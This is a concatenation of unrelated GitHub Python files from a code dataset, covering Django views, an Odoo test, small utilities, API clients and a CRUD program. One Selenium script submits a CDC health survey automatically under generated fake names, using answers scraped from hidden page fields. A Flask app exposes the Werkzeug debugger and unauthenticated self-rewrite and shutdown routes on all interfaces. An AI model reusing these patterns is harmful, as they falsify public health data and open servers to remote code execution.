sigma_grad_x=sigma_rho_x, sigma_grad_y=sigma_rho_y,\n sigma_dirichlet=sigma_rho_dirichlet)\n elif density_integration_method == 'w':\n # Weighted Least Squares\n rho, sigma_rho = Density_integration_WLS_uncertainty(X, Y, mask,rho_x, rho_y,\n dirichlet_label, rho_dirichlet,\n uncertainty_quantification=True,\n sigma_grad_x=sigma_rho_x, sigma_grad_y=sigma_rho_y,\n sigma_dirichlet=sigma_rho_dirichlet)\n\n # save the results to file\n savemat(filename='sample-result.mat', mdict={'X': X, 'Y': Y, 'rho': rho, 'sigma_rho': sigma_rho,\n 'dirichlet_label': dirichlet_label, 'rho_dirichlet':rho_dirichlet, 'sigma_rho_dirichlet':sigma_rho_dirichlet\n }, long_field_names=True)\n\n # plot results\n fig = helper_functions.plot_figures(X, Y, rho_x, rho_y, rho, sigma_rho)\n \n # save plot to file\n fig.savefig('sample-result.png')\n plt.close()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"lalitkrajendran/bos-density-integration-package","sub_path":"sample_script.py","file_name":"sample_script.py","file_ext":"py","file_size_in_byte":6772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72655404251","text":"from django.core.paginator import Paginator\nfrom django.core.paginator import EmptyPage\nfrom django.core.paginator import PageNotAnInteger\nfrom django.db.models import F\n\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404, redirect\n\n# Create your views here.\nfrom django.views.generic import ListView, DetailView\nfrom django.contrib import messages\n\nfrom news.models import Articles\nfrom .models import Programs\n\n\n\n\nclass ProgramsList(ListView):\n model = Programs\n template_name = 'programs/programms.html'\n paginate_by = 6\n\n def get_context_data(self, **kwargs):\n context = super(ProgramsList, self).get_context_data(**kwargs)\n list_exam = Programs.objects.all()\n paginator = Paginator(list_exam, self.paginate_by)\n\n page = self.request.GET.get('page')\n\n try:\n file_exams = paginator.page(page)\n except PageNotAnInteger:\n file_exams = paginator.page(1)\n except EmptyPage:\n file_exams = paginator.page(paginator.num_pages)\n context['programms_top'] = Articles.objects.all().order_by('-view')[:6]\n context['list_exams'] = file_exams\n return context\n\n# class ProgramsDetail(DetailView):\n# model = Articles\n# template_name = 'programs/programm.html'\n#\n# def get_context_data(self, **kwargs):\n# context = super(ProgramsDetail, self).get_context_data(**kwargs)\n# context['top_art'] = Articles.objects.all().order_by('-view')[:10]\n# context['top_prog'] = Programs.objects.all().order_by('?')[:10]\n\n\n\ndef ProgramsDetail(request, slug):\n tag=None\n article_details = get_object_or_404(Programs,slug=slug)\n top_art = Articles.objects.all().order_by('-view')[:6]\n top_prog = Programs.objects.all().order_by('?')[:6]\n articles_top = Articles.objects.all().order_by('-view')[:6]\n\n return render(\n request,\n 'programs/programm.html',\n {\n 'article_details': article_details,\n 'top_art':top_art,\n 'articles_top':articles_top,\n 'top_prog':top_prog,\n 'tag': tag\n }\n )\n\n\n\n\ndef post_searchProgramm(request):\n queryProgramm = request.GET.get('searchProgramm')\n if queryProgramm:\n results = Programs.objects.filter(title__icontains=queryProgramm).order_by('-date')\n\n total_results = results.count()\n return render(request,\n 'news/posts.html',\n {\n 'results': results,\n 'query': queryProgramm,\n 'total_results': total_results})\n else:\n messages.info(request, 'no results found for {}', format(queryProgramm))","repo_name":"LibGame/itRapter","sub_path":"itRapter/programs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27807192518","text":"from flask import Flask,request\nimport os,sys\nfrom werkzeug.serving import run_simple\n\napp=Flask(__name__)\n\ndef refresh():\n with open(__file__,'w') as fo:\n with open('target.py','r') as f2:\n fo.writelines(f2.readlines())\n with open(__file__) as fo:\n source_code = fo.read()\n byte_code = compile(source_code, __file__, \"exec\")\n # exec(byte_code)\n python = sys.executable\n os.execl(python, python, * sys.argv)\n exit()\n\n@app.route('/')\ndef home():\n return '1'\n\n@app.route('/add')\ndef add():\n refresh()\n return '12'\n\n@app.route('/shutdown')\ndef shutdown():\n shutdown_func=request.environ.get('werkzeug.server.shutdown')\n shutdown_func()\n raise RuntimeError\n\n\n \n\nif __name__=='__main__':\n run_simple('0.0.0.0',8000,app,use_debugger=True,use_reloader=False)\n # app.run(host='0.0.0.0')\n","repo_name":"Timothychen00/Flask-Reload","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22927537897","text":"from odoo.tests import Form\nfrom odoo.tests.common import SavepointCase\nfrom odoo.tools import float_compare\n\n\nclass TestDeliveryPriceMethod(SavepointCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n self = cls\n product_shipping_cost = self.env[\"product.product\"].create(\n {\n \"type\": \"service\",\n \"name\": \"Shipping costs\",\n \"standard_price\": 10,\n \"list_price\": 100,\n }\n )\n self.carrier = self.env[\"delivery.carrier\"].create(\n {\n \"name\": \"Test carrier\",\n \"delivery_type\": \"fixed\",\n \"product_id\": product_shipping_cost.id,\n \"fixed_price\": 99.99,\n }\n )\n self.pricelist = self.env[\"product.pricelist\"].create(\n {\n \"name\": \"Test pricelist\",\n \"item_ids\": [\n (\n 0,\n 0,\n {\n \"applied_on\": \"3_global\",\n \"compute_price\": \"formula\",\n \"base\": \"list_price\",\n },\n )\n ],\n }\n )\n self.product = self.env.ref(\"product.product_delivery_01\")\n self.partner = self.env.ref(\"base.res_partner_12\")\n self.sale = self.env[\"sale.order\"].create(\n {\n \"partner_id\": self.partner.id,\n \"pricelist_id\": self.pricelist.id,\n \"carrier_id\": self.carrier.id,\n \"order_line\": [\n (0, 0, {\"product_id\": self.product.id, \"product_uom_qty\": 1})\n ],\n }\n )\n\n def _add_delivery(self):\n sale = self.sale\n delivery_wizard = Form(\n self.env[\"choose.delivery.carrier\"].with_context(\n {\"default_order_id\": sale.id, \"default_carrier_id\": self.carrier}\n )\n )\n choose_delivery_carrier = delivery_wizard.save()\n choose_delivery_carrier.button_confirm()\n\n def test_delivery_price_fixed(self):\n sale = self.sale\n self._add_delivery()\n delivery_lines = sale.order_line.filtered(lambda r: r.is_delivery)\n delivery_price = sum(delivery_lines.mapped(\"price_unit\"))\n self.assertEqual(float_compare(delivery_price, 99.99, precision_digits=2), 0)\n self.assertEqual(len(delivery_lines), 1)\n sale.action_confirm()\n picking = sale.picking_ids[0]\n self.assertEqual(len(picking.move_lines), 1)\n self.assertEqual(picking.carrier_id, self.carrier)\n picking.action_confirm()\n picking.action_assign()\n self.assertFalse(picking.carrier_price)\n picking.send_to_shipper()\n self.assertEqual(picking.carrier_price, 99.99)\n\n def test_delivery_price_method(self):\n self.carrier.write({\"price_method\": \"fixed\", \"fixed_price\": 99.99})\n sale = self.sale\n self._add_delivery()\n delivery_lines = sale.order_line.filtered(lambda r: r.is_delivery)\n delivery_price = sum(delivery_lines.mapped(\"price_unit\"))\n self.assertEqual(float_compare(delivery_price, 99.99, precision_digits=2), 0)\n self.assertEqual(len(delivery_lines), 1)\n self.carrier.write({\"price_method\": \"fixed\", \"fixed_price\": 5})\n self._add_delivery()\n delivery_lines = sale.order_line.filtered(lambda r: r.is_delivery)\n delivery_price = sum(delivery_lines.mapped(\"price_unit\"))\n self.assertEqual(delivery_price, 5)\n self.carrier.write(\n {\n \"price_method\": \"base_on_rule\",\n \"price_rule_ids\": [\n (\n 0,\n 0,\n {\n \"variable\": \"quantity\",\n \"operator\": \"==\",\n \"max_value\": 1,\n \"list_base_price\": 11.11,\n },\n )\n ],\n }\n )\n self._add_delivery()\n delivery_lines = sale.order_line.filtered(lambda r: r.is_delivery)\n delivery_price = sum(delivery_lines.mapped(\"price_unit\"))\n self.assertEqual(delivery_price, 11.11)\n","repo_name":"OCA/delivery-carrier","sub_path":"delivery_price_method/tests/test_delivery_price_method.py","file_name":"test_delivery_price_method.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"32"} +{"seq_id":"73168720731","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nimport time\nimport os\n# Version: 2.0\n# 浏览器驱动版本:114.0.5735.90\n\n# 获取人名列表函数定义\ndef GettingNames(wd):\n # 调用WebDriver 对象的get方法 可以让浏览器打开指定网址\n wd.maximize_window()\n wd.get('https://www.qmsjmfb.com/')\n\n # 搜索名字\n elements = [element.text for element in wd.find_elements(By.XPATH, \"//div/ul/li\")]\n return elements\n\n# 填写身份信息函数定义\ndef FulfillInfo(wd, name):\n # 调用WebDriver 对象的get方法 可以让浏览器打开指定网址\n wd.maximize_window()\n wd.get('https://www.jscdc.cn/KABP2011/business/index1.jsp?tdsourcetag=s_pcqq_aiomsg')\n\n # 通过 Select 对象选中南京市,栖霞区,马群街道以及填入姓名\n Select(wd.find_element(By.ID, \"zone3\")).select_by_visible_text(\"南京市\")\n Select(wd.find_element(By.ID, \"zone4\")).select_by_visible_text(\"栖霞区\")\n Select(wd.find_element(By.ID, \"zone5\")).select_by_visible_text(\"马群街道\")\n wd.find_element(By.ID, 'name').send_keys(name)\n\n # 通过 Select 对象选中0~15岁以下,男,小学,学生,小学3~4年级\n Select(wd.find_element(By.ID, \"ageGroup\")).select_by_visible_text(\"0~15岁以下\")\n Select(wd.find_element(By.ID, \"sex\")).select_by_visible_text(\"男\")\n Select(wd.find_element(By.ID, \"educationStatus\")).select_by_visible_text(\"小学\")\n Select(wd.find_element(By.ID, \"metier\")).select_by_visible_text(\"学生\")\n Select(wd.find_element(By.ID, \"studentLevel\")).select_by_visible_text(\"小学3~4年级\")\n\n # 点击开始按钮\n wd.find_element(By.ID, 'log_img').click()\n\n# 回答问题函数定义\ndef AnsweringQuestions(wd):\n # 获取答案\n # 获取题数\n num = wd.find_element(By.ID, \"__subjectCount\")\n num = int(num.text)\n\n # 获取所有input的元素构成一个list\n answers = wd.find_elements(By.XPATH, \"//*[@id=\\\"subject\\\"]/input\")\n\n # 填充答案\n for i in range(num):\n answer = answers[i].get_attribute('value').split(\",\")[1]\n wd.find_element(By.CSS_SELECTOR, \"#KWait\" + str(i + 1) + \" input[value=\\\"\" + answer + str(i + 1) + \"\\\"]\").click()\n\n wd.find_element(By.ID, \"btnAct\" + str(num) + \"\").click()\n wd.switch_to.alert.accept()\n\n# Main Part\n# 创建 WebDriver 对象,指明使用chrome浏览器驱动\n# webDriver = webdriver.Chrome(service=Service(r'd:\\tools\\chromedriver.exe'))\nwebDriver = webdriver.Chrome(service=Service(r'114.0.5735.90\\chromedriver.exe'))\nnameList = GettingNames(webDriver)\n\n# 开始循环答题\nfor i in range(1):\n name = nameList[i]\n FulfillInfo(webDriver, name)\n AnsweringQuestions(webDriver)\n\n # 等到网页加载完毕后截屏保存\n time.sleep(1)\n\n # 检测截图文件夹是否存在\n if not os.path.exists('Screenshots/'):\n os.makedirs('Screenshots/')\n \n # 创建截图文件\n if(webDriver.get_screenshot_as_file('Screenshots/' + str(i+1) + '.png') ):\n print(\"Screenshots/\" + str(i+1) + \".png is saved successfully.\")\n else:\n print(\"Failed to save the Screenshots/\" + str(i+1) + \".png.\")\n break\n\n# 关闭浏览器\nwebDriver.close()\n","repo_name":"nwomn/AutoTask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30013584137","text":"\ndef stem_plot(lst):\n lst = [str(i) if i > 9 else '0'+str(i) for i in lst]\n dic = {}\n for i in lst:\n stem, leaf = i[:-1], i[-1]\n if stem not in dic: \n dic[stem] = []\n dic[stem] += [leaf]\n return ['{} | {}'.format(k, ' '.join(sorted(v))) for k, v in sorted(dic.items(), key=lambda x: int(x[0]))]\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"sibD9TFg7pmQuzJxW_10.py","file_name":"sibD9TFg7pmQuzJxW_10.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2055308551","text":"import pandas as pd\nimport sys\n\ndef get_state_code_index(df):\n col_list = list(df.columns).index('state_code')\n return col_list\n\ndef state_code_to_int(x):\n x[i] = int(x[i])\n return x\n\n# rst ne\ndef state_code_cleaner(df):\n df['state_code'] = df['state_code'].apply(str)\n df['len'] = df['state_code'].apply(lambda x: len((x)))\n tmp1 = df[(df['len'] == 9) & (~df['state_code'].str.contains('-'))]\n tmp2 = tmp1.drop(['len'],axis=1)\n df_fn = tmp2.apply(state_code_to_int,axis=1)\n # print(tmp2.head())\n return df_fn\n\nif __name__ == '__main__':\n\n fileIn = sys.argv[1]\n fileOut = fileIn[:-4] + '_clr.csv'\n\n df = pd.read_csv(fileIn)\n global i\n i = get_state_code_index(df)\n\n res = state_code_cleaner(df)\n # print(res.columns)\n # res = res.drop(['Unnamed: 0'],axis=1)\n # print(res.info())\n res.to_csv(fileOut,index=False)\n\n # print(state_code_cleaner(jb))\n # print(stae_code_cleaner(jb))\n # print(list(rst.columns).index('len'))\n # rst_fn.to_csv('data/restaurant_clean.csv')","repo_name":"tkionshao/com.iii.4th.state-center-maker","sub_path":"state_code_cleaner/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18576817801","text":"#!/usr/bin/python3\n\nimport json\nimport requests\nimport requests.exceptions\n\n\nclass DefectDojo():\n \"\"\"\n Initialize a DefectDojo API instance.\n \"\"\"\n def __init__(self, api_key, user, host, user_agent=None, verify_ssl=False, api_version='v2', timeout=60, debug=True):\n self.api_key = api_key\n self.user = user\n self.host = host + '/api/' + api_version + '/'\n self.verify_ssl = verify_ssl\n self.api_version = api_version\n self.timeout = timeout\n\n if not user_agent:\n self.user_agent = 'DefectDojo_api'\n else:\n self.user_agent = user_agent\n\n self.debug = debug\n\n def get_users(self, username=None, limit=20):\n params = {}\n if limit:\n params['limit'] = limit\n\n if username:\n params['username'] = username\n\n return self._request('GET', 'users/', params)\n\n def _request(self, method, url, params=None, data=None, files=None):\n \"\"\"Common handler for all HTTP requests.\"\"\"\n if not params:\n params = {}\n\n if data:\n data = json.dumps(data)\n\n headers = {\n 'User-Agent': self.user_agent,\n 'Authorization' : \"Token \" + self.api_key\n }\n\n if not files:\n headers['Content-Type'] = 'application/json'\n\n try:\n if self.debug:\n print(method + ' ' + self.host + url)\n print(params)\n print(headers)\n\n response = requests.request(method=method, url=self.host + url, params=params, data=data, files=files,\n headers=headers,\n timeout=self.timeout,\n verify=self.verify_ssl)\n\n if self.debug:\n print(response.status_code)\n print(response.text)\n\n\n # try:\n # if response.status_code == 201: #Created new object\n # object_id = response.headers[\"Location\"].split('/')\n # key_id = object_id[-2]\n # try:\n # data = int(key_id)\n # except:\n # data = response.json()\n #\n # return DefectDojoResponse(message=\"Upload complete\", data=data, success=True)\n # elif response.status_code == 204: #Object updates\n # return DefectDojoResponse(message=\"Object updated.\", success=True)\n # elif response.status_code == 400: #Object not created\n # return DefectDojoResponse(message=\"Error occured in API.\", success=False, data=response.text)\n # elif response.status_code == 404: #Object not created\n # return DefectDojoResponse(message=\"Object id does not exist.\", success=False, data=response.text)\n # elif response.status_code == 401:\n # return DefectDojoResponse(message=\"Unauthorized.\", success=False, data=response.text)\n # elif response.status_code == 414:\n # return DefectDojoResponse(message=\"Request-URI Too Large.\", success=False)\n # elif response.status_code == 500:\n # return DefectDojoResponse(message=\"An error 500 occured in the API.\", success=False, data=response.text)\n # else:\n # data = response.json()\n # return DefectDojoResponse(message=\"Success\", data=data, success=True, response_code=response.status_code)\n # except ValueError:\n # return DefectDojoResponse(message='JSON response could not be decoded.', success=False, data=response.text)\n # except requests.exceptions.SSLError:\n # return DefectDojoResponse(message='An SSL error occurred.', success=False)\n # except requests.exceptions.ConnectionError:\n # return DefectDojoResponse(message='A connection error occurred.', success=False)\n # except requests.exceptions.Timeout:\n # return DefectDojoResponse(message='The request timed out after ' + str(self.timeout) + ' seconds.',\n # success=False)\n except requests.exceptions.RequestException:\n return DefectDojoResponse(message='There was an error while handling the request.', success=False)\n\n\n\n\nclass DefectDojoResponse(object):\n \"\"\"\n Container for all DefectDojo API responses, even errors.\n\n \"\"\"\n\n def __init__(self, message, success, data=None, response_code=-1):\n self.message = message\n self.data = data\n self.success = success\n self.response_code = response_code\n\n def __str__(self):\n if self.data:\n return str(self.data)\n else:\n return self.message\n\n def id(self):\n if self.response_code == 400: #Bad Request\n raise ValueError('Object not created:' + json.dumps(self.data, sort_keys=True, indent=4, separators=(',', ': ')))\n return int(self.data)\n\n def count(self):\n return self.data[\"meta\"][\"total_count\"]\n\n def data_json(self, pretty=False):\n \"\"\"Returns the data as a valid JSON string.\"\"\"\n if pretty:\n return json.dumps(self.data, sort_keys=True, indent=4, separators=(',', ': '))\n else:\n return json.dumps(self.data)\n\n\n\nif __name__ == '__main__':\n pass","repo_name":"doublestraus/secret-finder","sub_path":"notification/defectdojo_old.py","file_name":"defectdojo_old.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"26281593900","text":"\"\"\"Sum of the Others\"\"\"\n\n# sumoftheothers\n\nwhile True:\n try:\n nums = list(map(int, input().split()))\n summary = sum(nums)\n for i, val in enumerate(nums):\n if summary - val == val:\n print(val)\n break\n except EOFError:\n break\n","repo_name":"lukaszlukaszew/kattis-solutions","sub_path":"S/sumoftheothers.py","file_name":"sumoftheothers.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31854407803","text":"from decimal import Decimal\nfrom src import constants\nfrom time import strptime\nfrom datetime import datetime\n\n\nclass Assignment(object):\n\n def __init__(self, name, due_date, category=None, points_earned=None, points_possible=None,\n grade=None, weighted=False):\n\n self.name = name\n self.due_date = due_date\n\n if category:\n self.category = category.title()\n else:\n self.category = None\n\n # if assignment is weighted, its category must be declared\n if weighted:\n self.grade = grade\n self.points_earned = grade\n self.points_possible = 100\n\n # if assignment is unweighted, and points earned and points possible are given\n elif not weighted and points_earned is not None and points_possible is not None:\n self.points_earned = Decimal(points_earned)\n self.points_possible = Decimal(points_possible)\n self.grade = points_earned / points_possible * 100\n\n # if assignment is unweighted, and only points possible are given\n # (meaning the assignment has not been completed)\n elif not weighted and points_possible is not None:\n self.points_earned = None\n self.points_possible = points_possible\n self.grade = None\n\n else:\n raise InvalidAssignment(\"Assignment must contain a valid set of inputs\")\n\n @staticmethod\n def parse_date(date):\n assignment_day = int(date[1])\n assignment_month = strptime(date[0], '%b').tm_mon\n base_year = constants.QUARTERS[0][2].year\n if assignment_month > 8:\n assignment_year = base_year\n else:\n assignment_year = base_year + 1\n return datetime(assignment_year, assignment_month, assignment_day)\n\n def __str__(self):\n return \"Name: {}, Due Date: {}-{}-{}, Grade: {}\".format(self.name,\n self.due_date.year,\n self.due_date.month,\n self.due_date.day,\n self.grade)\n\n\nclass InvalidAssignment(Exception):\n\n def __init__(self, message):\n super(InvalidAssignment, self).__init__(message)","repo_name":"jpackard18/vcgraph","sub_path":"src/assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"43030133852","text":"\"\"\"Code base runs inside a container and executes based on passed in parameters.\"\"\"\nimport sys\n\nimport vt\n\n\nclass VirusTotalService:\n\n def run(self, argv):\n\n client = vt.Client(argv[0])\n\n url_id = vt.url_id(argv[1])\n url = client.get_object('/urls/{}', url_id)\n\n return_dict = {}\n for item in dir(url):\n if not item.startswith('_'):\n return_dict[item] = getattr(url, item)\n return return_dict\n\n\nif __name__ == \"__main__\":\n print(VirusTotalService().run(sys.argv))\n","repo_name":"MSAdministrator/binocular","sub_path":"src/binocular/containers/virustotal.py","file_name":"virustotal.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41859467195","text":"import csv\nimport pyinputplus as pyip\nimport tabulate\nfrom datetime import datetime\n\ndef readCsv(pathCsv):\n \"\"\"Function to read your csv file\n\n Args:\n pathCsv (path) : path of your csv file\n\n Return:\n db : return your data from database as dictionary data type\n\n Warning:\n pay attention to the number of your columns in database. Need adjusment in updating dictionary data\n \"\"\"\n # Read csv file\n file = open(pathCsv, 'r')\n reader = csv.reader(file, delimiter=';')\n\n # columns\n columns = next(reader)\n\n # make dictionary data type. db as a variable of dictionary data\n db = {'columns':columns}\n for row in reader: # updating dictionary data\n db.update({\n str(row[0]) : [int(row[0]), \n str(row[1]),\n str(row[2]), \n str(row[3]),\n int(row[4]),\n str(row[5])\n ]})\n # close program\n file.close()\n # return the dictionary data\n return db\n\ndef writeCsv(database, pathCsv):\n \"\"\"Function to overwrite your csv file\n\n Args:\n pathCsv (path) : path of your csv file\n database : dictionary data\n \"\"\"\n # Open database in write condition\n file = open(pathCsv, 'w')\n\n # Keep the database up to date\n writer = csv.writer(file, lineterminator='\\n', delimiter=';')\n columns = list(database.values())[0] # termasuk kolom dan data\n data = list(database.values())[1:]\n writer.writerow(columns) #db.values()\n data = list(database.values())[1:]\n for i in data:\n writer.writerow(i)\n # close Program\n file.close() \n\ndef valueInttoStr(intlistData):\n \"\"\"Fungsi untuk mengubah semua item yg berupa integer \n menjadi string yang terdapat di dalam list\n Args:\n intlistData (list): list yang berisi item integer\n \n Returns:\n strChoices: list yang semua value itemnya berubah menjadi string\n \"\"\"\n strChoices = []\n for i in intlistData:\n a = str(i)\n strChoices.append(a)\n return strChoices\n\ndef record(pathRecord):\n \"\"\"Function for showing what user does in the program\n\n Args:\n pathRecord : variable that stored your path of record file\n \"\"\"\n file = open(pathRecord, \"r\")\n print(file.read())\n file.close()\n\n\"\"\"CURD FUNCTION: \n 1. Create : addMenu(arg1,arg2,...)\n 2. Update : updateMenu(arg1,arg2,...)\n 3. Read : readMenu(arg1,arg2,...)\n 4. Delete : deleteMenu(arg1,arg2,...)\n\"\"\"\n\n# Show data function\ndef readMenu(database):\n \"\"\"Function to show your data as tabular format\n\n Args:\n database (dictionary): database yang akan ditampilkan\n \"\"\"\n # 2D list of database from csv file\n data = list(database.values())[1:]\n # select menu inside readMenu:\n while True:\n choices = ['Show all data in database','Show database in detail', 'Back to Main Menu']\n userInput = pyip.inputMenu(prompt='Select Read Menu:\\n', choices=choices, numbered=True) ## userInput di-return sebagai string\n # If user choose 1st option\n if userInput == 'Show all data in database':\n # if data in database doesnt exist\n if data == []:\n # only display columns without any data\n # print title\n print(\"\"\"\n=============================================== Yellow Pages created by @Wajul ===============================================\\n\n \"\"\")\n print(tabulate.tabulate(data, headers=database['columns'], tablefmt=\"github\"))\n print(\"\\nData doesn't exist!\")\n else:\n # print title\n print(\"\"\"\n=============================================== Yellow Pages created by @Wajul ===============================================\\n\n \"\"\")\n # print database in tabular format\n print(tabulate.tabulate(data, headers=database['columns'], tablefmt=\"github\"))\n print('\\n')\n # If user choose 2nd option\n elif userInput == 'Show database in detail':\n if data == []:\n # only display columns without any data\n print(tabulate.tabulate(data, headers=database['columns'], tablefmt=\"github\"))\n print(\"\\nData doesn't exist!\")\n else:\n choicesDetail = ['Detail ID', 'businessField', 'City', 'sorted companyName', 'sorted ID']\n inputChoicesDetail = pyip.inputMenu(prompt='Filter or sort data according to the: \\n', choices=choicesDetail, numbered=True)\n # data detailing based on ID\n if inputChoicesDetail == 'Detail ID':\n choices1 = [data[index][0] for index in range(len(data))]\n userInput1 = pyip.inputInt(prompt=\"Which ID do you want to return ?\\n\")\n #userInput1 = pyip.inputInt(prompt='Which ID do you want to return ?\\n', blockRegexes=[r'a-zA-Z'], lessThan=len(data))\n # if ID (index) doesn't exist in database\n if userInput1 not in choices1:\n print('Data does not exist!\\n')\n # else: ID (index) exist in database\n else:\n print(tabulate.tabulate(list([database[str(userInput1)]]), headers=database['columns'], tablefmt=\"github\"))\n print('\\n')\n \n # data detailing based on businessField \n elif inputChoicesDetail == 'businessField':\n # Available businessField stored in set data type, hence there's no duplication, then convert into list data type\n businessFieldSet = {data[index][2] for index in range(len(data))}\n businessFieldList = list(businessFieldSet)\n # user choose city\n userInput = pyip.inputMenu(prompt=\"Input the businessField you're looking for\\n\", choices=businessFieldList, numbered=True)\n # find the keys of dictionary data\n keysTarget = [str(i[0]) for i in data if i[2] == userInput]\n\n # data target in 2D list based on keysTarget\n dataTarget = [database[i] for i in keysTarget]\n\n # show dataTarget in tabular format\n print(tabulate.tabulate(dataTarget, headers=database['columns'], tablefmt='github'))\n \n # data detailing based on city\n elif inputChoicesDetail == 'City':\n # Available city stored in set data type, hence there's no duplication, the convert into list data type\n citySet = {data[index][3] for index in range(len(data))}\n cityList = list(citySet)\n # user choose city\n userInput = pyip.inputMenu(prompt=\"Input the city you're looking for\\n\", choices=cityList, numbered=True)\n # find the keys of dictionary\n keysTarget = [str(i[0]) for i in data if i[3] == userInput]\n\n # data target in 2D list based on keysTarget\n dataTarget = [database[i] for i in keysTarget]\n\n # show dataTarget in tabular format\n print(tabulate.tabulate(dataTarget, headers=database['columns'], tablefmt='github'))\n \n # sorting based on companyName (A-Z)\n elif inputChoicesDetail == 'sorted companyName':\n # sorted company Name\n companyNameList = [data[index][1] for index in range(len(data))]\n companyNameSort = sorted(companyNameList) # order by companyName A-Z #\n\n # find the keys of dictionary\n keysTarget = []\n for valuesI in companyNameSort: # compare sorted companyName with 2D list[1] which is companyName of database, \n for valuesJ in data: # when match, return index[0] which is similar with keys\n if valuesI == valuesJ[1]:\n keysTarget.append(valuesJ[0])\n\n # data target in 2D list based on keysTarget\n dataTarget = [database[str(i)] for i in keysTarget]\n\n # show dataTarget in tabular format\n print(tabulate.tabulate(dataTarget, headers=database['columns'], tablefmt='github'))\n \n # sorting based on ID (0-9)\n else:\n # sorted ID\n idList = [data[index][0] for index in range(len(data))]\n idSort = sorted(idList) # order by ID 0-9 #\n\n # find the keys of dictionary\n keysTarget = []\n for valuesI in idSort: # compare sorted ID with 2D list[0] which is ID of each data in database, \n for valuesJ in data: # when match, return index[0] which is similar with keys\n if valuesI == valuesJ[0]:\n keysTarget.append(valuesJ[0])\n\n # data target in 2D list based on keysTarget\n dataTarget = [database[str(i)] for i in keysTarget]\n\n # show dataTarget in tabular format\n print(tabulate.tabulate(dataTarget, headers=database['columns'], tablefmt='github'))\n\n # back to main menu\n else:\n break\n\n\n# add data\ndef addMenu(database, pathRecord):\n \"\"\"Function to add data into your database\n\n Args:\n database (dict): database yang akan diolah\n pathRecord: variable that stored your path of record file\n\n Return:\n database: latest database\n \"\"\"\n # list of data\n data = list(database.values())[1:]\n\n while True:\n choices = ['Menambahkan data Yellow Pages', 'Kembali ke Main Menu']\n userInput = pyip.inputMenu(prompt='Select Add Menu:\\n', choices=choices, numbered=True)\n if userInput == 'Menambahkan data Yellow Pages':\n # check the ID does exist or not ?\n choices1 = [data[index][0] for index in range(len(data))]\n userInputIndex = pyip.inputInt(prompt='Masukkan ID (index) yang ingin ditambahkan: ') # input ID\n # if data already exist, show notification 'Data already exist!'\n if userInputIndex in choices1:\n print('ID already exist!')\n # if ID doesnt exist, you can add to database\n else:\n companyName = pyip.inputStr(prompt='input company name: ', applyFunc=lambda x: x.title(), blockRegexes='1234567890@')\n businessField = pyip.inputStr(prompt='input business field: ', applyFunc=lambda x: x.title(), blockRegexes='1234567890@')\n city = pyip.inputStr(prompt='input city: ', applyFunc=lambda x: x.title(), blockRegexes='1234567890@')\n # number of digits of phone number must be less than or equal to 11 digits\n while True:\n phoneNumber = pyip.inputInt(prompt='input phone number: ')\n if len(str(phoneNumber)) <= 11:\n break\n else:\n print(\"number of digits of the phone number must be less than or equal to 11 digits\")\n email = pyip.inputEmail(prompt='input email: ')\n \n # display added data in tabular format\n tabularAddedData = [userInputIndex, companyName, businessField, city, phoneNumber, email]\n print(tabulate.tabulate(list([tabularAddedData]), headers=database['columns'], tablefmt=\"github\"))\n\n ## saving menu option\n savingMenuInput = pyip.inputYesNo(prompt='Are you sure want to save the data ? (Yes/No):')\n if savingMenuInput == 'yes':\n database.update(\n {f'{userInputIndex}': [userInputIndex, companyName, businessField, city, phoneNumber, email]})\n \n # show data after added data in database\n data.append(tabularAddedData)\n print(tabulate.tabulate(data, headers=database['columns'], tablefmt=\"github\"))\n \n # notification that data 'Data successfully saved!'\n print('\\nData successfully saved!\\n')\n \n # datetime object containing current date and time\n now = datetime.now()\n # dd/mm/YY H:M:S\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n # write record.txt\n file = open(pathRecord, 'a')\n file.write(f'(ADD) User has added data with ID number {userInputIndex} at {dt_string}\\n')\n file.close()\n else:\n print('\\nOkey double check your input data!')\n \n # back to Main Menu\n else:\n break\n \n # keep database up to date\n return database\n\n\n# delete data\ndef deleteMenu(database, pathRecord, pathCsv):\n \"\"\"Function to delete data in your database\n\n Args:\n database (dict): database yang akan diolah\n pathRecord: variable that stored your path of record file\n pathCsv : variable that stored your path of csv file\n \n Returns:\n database: latest database\n \"\"\"\n\n # select delete menu\n while True:\n # read latest database\n readCsv(pathCsv)\n\n # list of data\n data = list(database.values())[1:]\n\n # available ID\n choices = [data[index][0] for index in range(len(data))]\n\n # run sub-delete menu\n choices1 = ['Delete data in Yellow Pages database', 'Back to Main 